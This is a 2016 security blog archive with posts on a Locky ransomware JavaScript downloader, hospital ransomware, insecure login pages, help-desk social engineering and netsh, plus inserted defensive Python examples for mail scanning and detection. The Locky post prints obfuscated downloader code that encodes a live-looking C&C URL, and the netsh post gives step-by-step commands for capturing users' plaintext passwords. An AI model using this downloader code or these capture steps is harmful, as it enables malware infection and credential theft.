Monthly Archives: February 2016

TrojanDownloader:JS/Locky.A is a terrible piece of malware

27 February 2016

Outlook is definitely my favorite email app. If properly configured, spear phishing attacks can be easily detected, and so it was here.

Email with Locky Attachment


Since the attachment was too small to contain an image, I opened the zip file and found a JavaScript version of Locky.A inside. As always, most of the popular anti-malware scanners identified the malicious code only after one day.

It’s always good to know the enemy. Therefore, I’ve put the code snippet that downloads the payload from the Command & Control server here:

try {
var    jsaykajS = '\u0052un';
/*  Translates into:  var    jsaykajS = 'Run'; */

wRXGXAa['\u006Fpe\u006E']('\u0047ET' , '\u0068\u0074\u0074\u0070:\u002F\u002F\u007A\u0061\u007Aa\u002D\u006B\u0079\u006A\u006F\u0076\u002E\u0063\u007A\u002F\u0073\u0079\u0073\u0074\u0065\u006D\u002F\u0063\u0061\u0063\u0068\u0065\u002F\u0038\u0037\u0068\u0037\u0035\u0034', false);
/* Translates into:  wRXGXAa['open']('GET', '<C&C URL, unicode-escaped above>', false); */

/* Translates into: wRXGXAa['Send'] ();  */
lRJrL [jsaykajS](LWHEQOz, 1, false);
/* Translates into: lRJrL['Run'](LWHEQOz, 1, false); */
} catch (ajg9ggxFs) {};

It’s important to note that even small changes to the code cut the detection rate dramatically. Cyber criminals can create new versions easily because JavaScript can be modified with nothing more than Notepad. Against this, classic anti-malware systems have only a limited effect.

How to deal with this challenge? The first line of defense is, as always, user awareness training.

In addition, in-depth scanning of all incoming and outgoing emails is required. To be honest, I would recommend stripping off suspicious attachments (scripts of any kind, executables, compressed files, old-style Office documents, xlsm, docm, PDFs with embedded files, etc.) and notifying the users of the protection measures taken.
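What such in-depth scanning looks like in practice, as an added example that is not part of the original post: the script below inspects a mail attachment the way a gateway would, unpacks a ZIP in memory, flags the file types recommended for stripping, and for a script file decodes the backslash-u string obfuscation seen in the Locky.A snippet above so the download URL can be extracted as an indicator. The message, the ZIP, the script inside it and the host name payload.example.invalid are all constructed for the example; the extension list is an assumed typical gateway policy.

```python
import email
import io
import re
import zipfile
from email.message import EmailMessage

# Extensions the post recommends stripping (assumption: a typical gateway policy).
RISKY_EXTENSIONS = {
    ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1", ".bat", ".cmd",
    ".exe", ".scr", ".com", ".dll",
    ".docm", ".xlsm", ".pptm", ".doc", ".xls", ".ppt",
    ".zip", ".rar", ".7z",
}
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}
MAX_MEMBER_BYTES = 5 * 1024 * 1024  # refuse to inflate huge ZIP members

# Constructed downloader snippet in the same obfuscation style as the post:
# unicode escapes hide 'Run', 'open', 'GET' and the download URL.
SAMPLE_SCRIPT = (
    r"var jsaykajS = '\u0052un';" "\n"
    r"wRXGXAa['\u006Fpe\u006E']('\u0047ET', "
    r"'\u0068\u0074\u0074\u0070://payload.example.invalid/system/cache/87h754', false);" "\n"
    r"lRJrL[jsaykajS](LWHEQOz, 1, false);" "\n"
)

_UNICODE_ESCAPE = re.compile(r"\\u([0-9A-Fa-f]{4})")
_URL = re.compile(r"""https?://[^\s'"<>]+""")


def decode_unicode_escapes(source):
    """Replace every backslash-u escape with the character it encodes."""
    return _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), source)


def extract_urls(source):
    """URLs visible once the string obfuscation is undone (sorted, unique)."""
    return sorted(set(_URL.findall(decode_unicode_escapes(source))))


def build_sample_message():
    """Constructed phishing-style mail: a tiny ZIP attachment holding a .js file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice_scan.js", SAMPLE_SCRIPT)
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Scanned image"
    msg.set_content("Please see the attached scan.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="scan_0042.zip")
    return msg.as_bytes()


def _check_file(name, data, findings):
    ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in RISKY_EXTENSIONS:
        findings["risky_files"].append(name)
    if ext == ".zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    if info.is_dir() or info.file_size > MAX_MEMBER_BYTES:
                        continue
                    # Recurse so nested archives and scripts inside are seen too.
                    _check_file(name + "/" + info.filename, zf.read(info), findings)
        except zipfile.BadZipFile:
            findings["risky_files"].append(name + " (unreadable zip)")
    elif ext in SCRIPT_EXTENSIONS:
        findings["urls"].extend(extract_urls(data.decode("utf-8", "replace")))


def scan_message(raw):
    """Walk every attachment, look inside ZIPs, and return what the gateway should do."""
    findings = {"risky_files": [], "urls": []}
    msg = email.message_from_bytes(raw)
    for part in msg.walk():
        name = part.get_filename()
        if not name:
            continue
        _check_file(name, part.get_payload(decode=True), findings)
    findings["urls"] = sorted(set(findings["urls"]))
    findings["strip"] = bool(findings["risky_files"])  # strip and notify the user
    return findings


if __name__ == "__main__":
    print(scan_message(build_sample_message()))
```

The decoded URL is the piece worth feeding into web-proxy blocking, and the "strip" verdict is what the gateway acts on; the user notification the post recommends would be generated from the risky_files list.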

Users will not be thrilled, but that’s much better than paying lots of money to cyber criminals or going out of business for a long time.

Have a good weekend, and take care.

Hollywood Presbyterian Medical Center Victim of Cyber Attack

20 February 2016

Hollywood Presbyterian Medical Center was hit by a ransomware attack around February 5th. At almost the same time some hospitals in Germany were hit by a similar attack.

In both cases the attack was initiated by emails with malicious attachments. In both cases the impact was nearly the same: hospital operations almost came to a halt. And in both cases the IT groups were able to prevent the worst by rapid and effective intervention.

IT operations, and thus medical operations, were massively hampered for some days because the malware rapidly changed its code. In such cases pattern-based anti-malware systems are of only limited help in recovering IT operations.

From my point of view, an effective ISMS is the best way to deal with ransomware. And the way the IT groups dealt with the attack shows that they have an ISMS, or something similar, implemented and practiced.

Hospitals are becoming increasingly dependent on a fully operational IT infrastructure. Even a shutdown of a few days can hardly be tolerated. Therefore, we need an entirely new approach to providing services to hospital staff.

Spear phishing attacks, drive-by downloads, JavaScript attacks, etc. are omnipresent today. Thus computers are potentially compromised simply because they are connected to the internet. This holds even if the computers are operated only inside a company network.

The ‘trusted computer in a trusted company network’ paradigm is no longer relevant. A shift to the ‘zero trust’ paradigm is imperative to prevent unacceptable outages.

The good news is that the technology for implementation of a ‘zero trust’ paradigm is ready today:

The hospital IT systems are isolated in a Core Data Services Network (CDSN). Access to the CDSN is provided via virtual desktops. The Virtual Desktop Infrastructure (VDI) is hosted in the CDSN. Email and internet access are blocked in the CDSN, as is direct data exchange between the virtual desktops and the user workstations. Data exchange between the CDSN and the user workstations is controlled through secure gateways. Only the user workstations or smart devices have access to the internet and the company’s email system, which remains outside the CDSN.

This is just a blueprint. With Software Defined Networking it’s easier to implement today.

The big advantage is that, even if a user’s workstation is compromised, the likelihood of an impact on the hospital’s IT systems and data in the CDSN is dramatically reduced. And recovery from an attack with ransomware is very easy: run a fresh installation of Windows on the compromised computer. Sounds easy, doesn’t it?

Have a good weekend.

New: Firefox warns of login forms on non-HTTPS pages

18 February 2016

Firefox has displayed security alerts in the Browser Console since Firefox Version 26 whenever a URL with a password field was opened over an HTTP connection:

Password fields present on an insecure (http://) page. This is a security risk that allows user login credentials to be stolen.

This is a clear sign that your service provider does not care about security. Since the constant switching back and forth between the browser window and the console is really annoying, this function was rarely used.

With the latest Version 44, Firefox displays a notification in the URL bar if you open a URL with a password field over an unsecured HTTP connection.

For configuration:

  • Open the URL about:config in Firefox.
  • Accept the warning that you will be careful when changing settings.
  • Set the security.insecure_password.ui.enabled preference to true if you want to be warned about non-secure login pages.

With this, Firefox displays a padlock with a red slash whenever it opens a page with a password field over an insecure connection:

Firefox warns of password field on insecure page
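The same check can be run by a service provider over its own login pages before the browser shows users the red-slashed padlock. The following is an added example, not code from the original post or from Firefox: it scans a page's HTML for password fields and reports the case Firefox flags (a password field on a page served over http://) plus a form that submits its credentials to an http:// action. The two HTML documents and the host name portal.example.invalid are constructed test input.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _LoginFormScanner(HTMLParser):
    """Collects password fields together with the form action they post to."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.current_action = None   # resolved action of the <form> we are inside
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # A missing or relative action resolves against the page URL.
            self.current_action = urljoin(self.page_url, attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self._check_password_field(attrs.get("name") or "(unnamed)")

    def handle_endtag(self, tag):
        if tag == "form":
            self.current_action = None

    def _check_password_field(self, name):
        page_scheme = urlsplit(self.page_url).scheme
        target = self.current_action or self.page_url
        if page_scheme != "https":
            # The case Firefox warns about: the page itself is not protected,
            # so the form (and the field) could have been tampered with in transit.
            self.findings.append((name, "page served over " + page_scheme))
        elif urlsplit(target).scheme != "https":
            # Page is fine but the credentials would leave over plain HTTP.
            self.findings.append((name, "form submits to " + target))


def insecure_password_fields(page_url, html):
    """Return [(field name, reason)] for every password field that is at risk."""
    scanner = _LoginFormScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages.
HTTP_LOGIN = """<html><body><form action="/login" method="post">
<input type="text" name="user"><input type="password" name="pass">
</form></body></html>"""

HTTPS_PAGE_HTTP_ACTION = """<html><body>
<form action="http://portal.example.invalid/login" method="post">
<input type="password" name="pass"></form></body></html>"""

HTTPS_OK = """<html><body><form action="/login" method="post">
<input type="password" name="pass"></form></body></html>"""


if __name__ == "__main__":
    for url, page in [("http://portal.example.invalid/login", HTTP_LOGIN),
                      ("https://portal.example.invalid/login", HTTPS_PAGE_HTTP_ACTION),
                      ("https://portal.example.invalid/login", HTTPS_OK)]:
        print(url, insecure_password_fields(url, page))
```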


Take care, and enjoy the new security feature.

CNAP – a comprehensive approach to cyber security

15 February 2016

I really appreciate the comprehensive approach of the Cybersecurity National Action Plan (CNAP), because the news of the cyber-attack on the Department of Homeland Security made one thing crystal clear:

It’s definitely not enough to focus on upgrading the U.S. IT security infrastructure. Security protocols must be reviewed and adjusted where necessary, and employees must be trained in their correct application.

Moreover, employees must be empowered to say “No, I’m sorry, this is not allowed!” whenever a caller cannot be unambiguously identified.

Take care!

Rules for safe handling of electronic grid cards required to avoid cyber risks

13 February 2016

Electronic grid cards are often used to implement strong or two-factor authentication. Although they offer less security than e.g. physical grid cards or authenticator apps, they are very popular because the rollout is easy: just assign the grid card to the user in the authentication system, email the PDF document with the grid card, and off you go.

That sounds good, but without training in the proper handling of the grid card this may end up in a security nightmare. Besides processes for e.g. blocking the grid card in the case of loss or theft, rules for proper handling need to be defined and communicated to all users:

  • Print the grid card and store the printout in a safe place.
  • If required for convenient access, store the grid card on a secured mobile device.
  • Delete the email after printing and empty the mail program’s waste bin.
  • Delete the PDF document after printing and make sure it is neither cached nor left in the computer’s waste bin.
  • Do not note down passwords on the back of the grid card.

Please note that this list should not be considered complete.

In particular, copies on any kind of online storage may pose a risk to a company. A cyber attacker who has hijacked a computer may find the online copy and use it whenever it is requested, e.g., for secure logon to the company’s web access portal.

Take care.

U.S. Department of Homeland Security hacked

9 February 2016

I was really shocked when I read the LIFARS post ‘Hacker Allegedly Dumps Data of 9,000 DHS Employees’ at 5:30 this morning.

It is very remarkable how easy it was for the attacker to get access to the DHS network:

“So I called up, told them I was new and I didn’t understand how to get past [the portal],” the hacker told the outlet. “They asked if I had a token code, I said no, they said that’s fine—just use our one.”

From this it’s apparent that the help desk has not had enough training in the procedure for verifying a caller’s identity. In addition, passing on the token code is a massive violation of the security procedures.

Take care! And train the help desk staff…

Is your help desk prepared for this type of malware?

6 February 2016

Some variants of the W2KM_DRIDEX.BM trojan behave really strangely if User Account Control (UAC) is set to the highest level, ‘Always notify me’. In this case the malware attempts several times to elevate its own privileges. For a detailed description of the malware see the post ‘Analysis of an Undetected Dridex Sample’ in the REAQTA blog.

Although this behavior is really annoying, everything went well so far. UAC did exactly what it was designed for: notify the user that something requests higher privileges. Without approval by the user, UAC blocks further execution and thus prevents Dridex from becoming persistent.

What next? In the best case, if the user cannot elevate the program, he calls the help desk. But is the help desk staff ready for this? What is the proper response to this challenge?

The proper response is to quarantine the computer and disinfect the system, or to tell the user to keep calm, create an incident ticket and send it to the SOC.

The worst possible response would be to approve the request by entering the credentials of a privileged account. In this case Dridex starts over, becomes persistent, and the attacker can start his malicious work.

Golden Triangle of IT Security


IT security is created by a combination of people, processes and technology. Even if processes and technology complement each other perfectly, people may become the critical factor. In particular, if help desk staff turnover is high, awareness training and knowledge management become a major issue.

Have a good weekend.

netsh – The Cyber Attacker’s Tool of Choice

3 February 2016

For IT pros, the Windows built-in command netsh is one of the tools of choice for troubleshooting network issues.

For a cyber attacker, netsh is the tool of choice once he has managed to get access to the company network. ‘netsh trace’ may be used to record, in plain text, every keystroke a user sends e.g. to the login dialog of a web application or a banking application.

Using netsh trace is disturbingly easy:

[1] Start the recording session for programs connecting to internet services

netsh trace start scenario=InternetClient capture=yes tracefile=NetTrace-ICP.etl level=4

[2] Wait for the user to connect to a service …

[3] Stop the recording session

netsh trace stop

[4] Convert the trace file into readable format

netsh trace convert input=NetTrace-ICP.etl output=NetTrace-ICP.etl.xml dump=XML

[5] Open the file with notepad and search for the user name

<Data Name="RequestHandle">0xCC000C</Data>
<Data Name="Length">502</Data>
<Data Name="Headers">;passwd=-Plain-Text-Here-&amp;;……</Data>

Thus netsh trace can replace key loggers or tools like Mimikatz or LaZagne. Since the attacker need not reload utilities from the C&C server, the likelihood of detection decreases.

Fortunately, the attacker must run netsh trace in an administrative context, but since many users always work in an admin context this is not a real hurdle.
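Because netsh is a signed, built-in binary, the practical detection point is the process-creation event, not the file. The following is an added example, not part of the original post: a small detection run over constructed process-creation records in the shape Sysmon Event ID 1 or Windows Security event 4688 provide (image, command line, user, integrity level). It flags ‘netsh trace start’ with capture=yes as high severity, the later ‘netsh trace convert’ as medium, and a trace without packet capture as low, so a SOC can review who is recording network traffic and where the trace files land. The host names, user names and events are placeholders constructed for the example.

```python
import re
import shlex

# Constructed sample events; the fields mirror Sysmon EID 1 / Security 4688.
SAMPLE_EVENTS = [
    {"host": "WS-0815", "user": "CORP\\jdoe", "integrity": "High",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh trace start scenario=InternetClient capture=yes tracefile=NetTrace-ICP.etl level=4"},
    {"host": "WS-0815", "user": "CORP\\jdoe", "integrity": "High",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh trace convert input=NetTrace-ICP.etl output=NetTrace-ICP.etl.xml dump=XML"},
    {"host": "WS-0815", "user": "CORP\\jdoe", "integrity": "Medium",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh interface ip show config"},          # benign troubleshooting
    {"host": "SRV-NET1", "user": "CORP\\netadmin", "integrity": "High",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh trace start scenario=NetConnection capture=no tracefile=diag.etl"},
]

_NETSH = re.compile(r"netsh(\.exe)?$", re.IGNORECASE)


def parse_netsh_trace(cmdline):
    """Return (subcommand, {key: value}) for a 'netsh trace ...' command line,
    or None if the command line is not a netsh trace invocation."""
    try:
        argv = shlex.split(cmdline, posix=False)   # keep Windows backslashes intact
    except ValueError:
        return None
    # netsh may be invoked as 'netsh', 'netsh.exe' or with its full path.
    if len(argv) < 3 or not _NETSH.search(argv[0]) or argv[1].lower() != "trace":
        return None
    params = {}
    for token in argv[3:]:
        key, sep, value = token.partition("=")
        if sep:
            params[key.lower()] = value.strip('"')
    return argv[2].lower(), params


def classify_event(event):
    """Return a finding for a suspicious netsh trace event, else None."""
    parsed = parse_netsh_trace(event["cmdline"])
    if parsed is None:
        return None
    sub, params = parsed
    if sub == "start" and params.get("capture", "").lower() == "yes":
        severity = "high"
        reason = "packet capture started (capture=yes), scenario=%s" % params.get("scenario", "?")
    elif sub == "start":
        severity = "low"
        reason = "trace started without packet capture"
    elif sub == "convert":
        severity = "medium"
        reason = "trace file converted to readable form"
    else:
        return None   # 'netsh trace stop', 'show status' etc. are not alerted on
    return {
        "host": event["host"], "user": event["user"],
        "integrity": event.get("integrity"), "severity": severity, "reason": reason,
        # the artefact a responder should collect and compare against known diagnostics
        "tracefile": params.get("tracefile") or params.get("input"),
    }


def detect(events):
    """Run the rule over a batch of events and keep only the findings."""
    return [f for f in map(classify_event, events) if f]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The same logic maps directly onto a SIEM rule: alert on image netsh.exe with command line containing ‘trace start’ and ‘capture=yes’, and correlate a following ‘trace convert’ on the same host. The low-severity case exists so that legitimate diagnostic traces by network staff can be allow-listed by user and tracefile rather than silently ignored.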

Apart from cyber attacks, users should be concerned about privacy issues. If a support technician starts netsh in a remote troubleshooting session, the likelihood is high that he may see your password or PIN. To prevent trouble, users should always change their passwords after netsh has been used to solve network issues.

Take care!